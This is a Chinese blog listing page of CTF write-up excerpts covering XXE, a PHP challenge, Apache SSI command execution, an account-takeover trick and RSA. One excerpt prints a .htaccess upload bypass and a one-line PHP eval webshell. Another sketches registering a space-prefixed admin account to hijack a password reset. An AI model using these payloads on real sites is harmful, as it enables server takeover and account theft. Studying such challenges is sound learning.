上一页 1 ··· 5 6 7 8 9 10 11 12 13 ··· 15 下一页
该文被密码保护。 阅读全文
posted @ 2020-05-14 18:59 山野村夫z1 阅读(0) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-05-14 18:59 山野村夫z1 阅读(0) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-05-14 18:58 山野村夫z1 阅读(0) 评论(0) 推荐(0) 编辑
摘要: 知识点 xml实体注入 题目提示XML,可知为XXE攻击,原理参考https://www.freebuf.com/vuls/175451.html 简要来讲就是客户端向服务器发送了XML数据,这个数据能被我们控制,这样我们就可以增加一个恶意的外部实体,实现攻击 先抓包 这里看到username和pa 阅读全文
posted @ 2020-05-14 18:00 山野村夫z1 阅读(424) 评论(0) 推荐(0) 编辑
摘要: F12可以看到格式化好的源码 <?php #I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET[ 阅读全文
posted @ 2020-05-14 17:22 山野村夫z1 阅读(1144) 评论(0) 推荐(0) 编辑
摘要: 可以上传.htaccess文件和jpg文件 先上传一下.htaccess文件 SetHandler application/x-httpd-php 再上传图片马 <?php eval($_POST[cmd]);?> 最后蚁剑连接一下,拿到flag 阅读全文
posted @ 2020-05-14 17:10 山野村夫z1 阅读(924) 评论(0) 推荐(0) 编辑
摘要: 脑洞题 F12查看源码 发现id处两串十六进制很奇怪,转换一下得到 0x506F2E ==> Po.0x706870 ==> php Po是化学元素钋 把元素周期表里的元素列出来,挨个访问一下 贴一下别人的脚本,懒,脚本来自https://www.cnblogs.com/gaonuoqi/p/126 阅读全文
posted @ 2020-05-14 16:51 山野村夫z1 阅读(403) 评论(0) 推荐(0) 编辑
摘要: 知识点 Apache SSI远程命令执行漏洞 扫描到后台后swp文件泄露,访问一下得到源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012 阅读全文
posted @ 2020-05-13 23:03 山野村夫z1 阅读(348) 评论(0) 推荐(0) 编辑
摘要: 知识点 账户接管漏洞 参考https://www.colabug.com/2020/0204/6940556/amp/ 注册一个空格admin用户 登录成功后再登出 在登录页面选择忘记密码 改密链接会发送到注册邮箱中,这里使用buuoj的内部邮箱 在邮箱中修改密码 使用admin用户和更改后的密码进 阅读全文
posted @ 2020-05-13 20:58 山野村夫z1 阅读(470) 评论(0) 推荐(0) 编辑
摘要: [BJDCTF 2nd]rsa1 #coding:utf-8 from libnum import * from gmpy2 import * import math e=12990949 p_2_q_2=18378273100717402294789767887365434240878716336 阅读全文
posted @ 2020-05-13 20:14 山野村夫z1 阅读(408) 评论(0) 推荐(0) 编辑
上一页 1 ··· 5 6 7 8 9 10 11 12 13 ··· 15 下一页